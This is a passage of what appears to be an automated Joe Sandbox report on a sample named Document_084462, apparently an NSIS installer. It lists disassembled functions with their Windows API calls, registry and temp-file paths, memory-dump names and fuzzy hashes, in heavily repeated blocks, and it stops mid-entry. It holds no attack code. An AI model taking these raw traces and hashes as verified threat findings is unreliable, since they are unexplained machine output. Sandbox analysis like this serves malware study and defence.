                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                              • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                                                              • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                              • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                                                              Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValuelstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 2655323295-2333618704
                                                                              • Opcode ID: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                              • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                                                              • Opcode Fuzzy Hash: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                              • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                                                              Function 00405DCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 3248276644-2962327952
                                                                              • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                              • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                                                              • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                              • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                                                              Function 00405D6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                              • CharNextW.USER32(00000000), ref: 00405D81
                                                                              • CharNextW.USER32(00000000), ref: 00405D99
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp, xrefs: 00405D6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 3213498283-2333618704
                                                                              • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                              • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                                                              • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                              • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                                                              Function 00405CC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-3355392842
                                                                              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                              • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                                                              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                              • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                                                              Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll), ref: 0040268D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp$C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll
                                                                              • API String ID: 1659193697-3208637225
                                                                              • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                              • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                                                              • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                              • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                                                              Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,00000000,0040318F,?,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                              • GetTickCount.KERNEL32 ref: 00402FE2
                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                              • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                              • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                                                              • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                              • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                                                              Function 004053CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 004053F9
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                                                                • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                              • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                                                              • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                              • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                                                              Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                                                              • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: Call
                                                                              • API String ID: 3356406503-1824292864
                                                                              • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
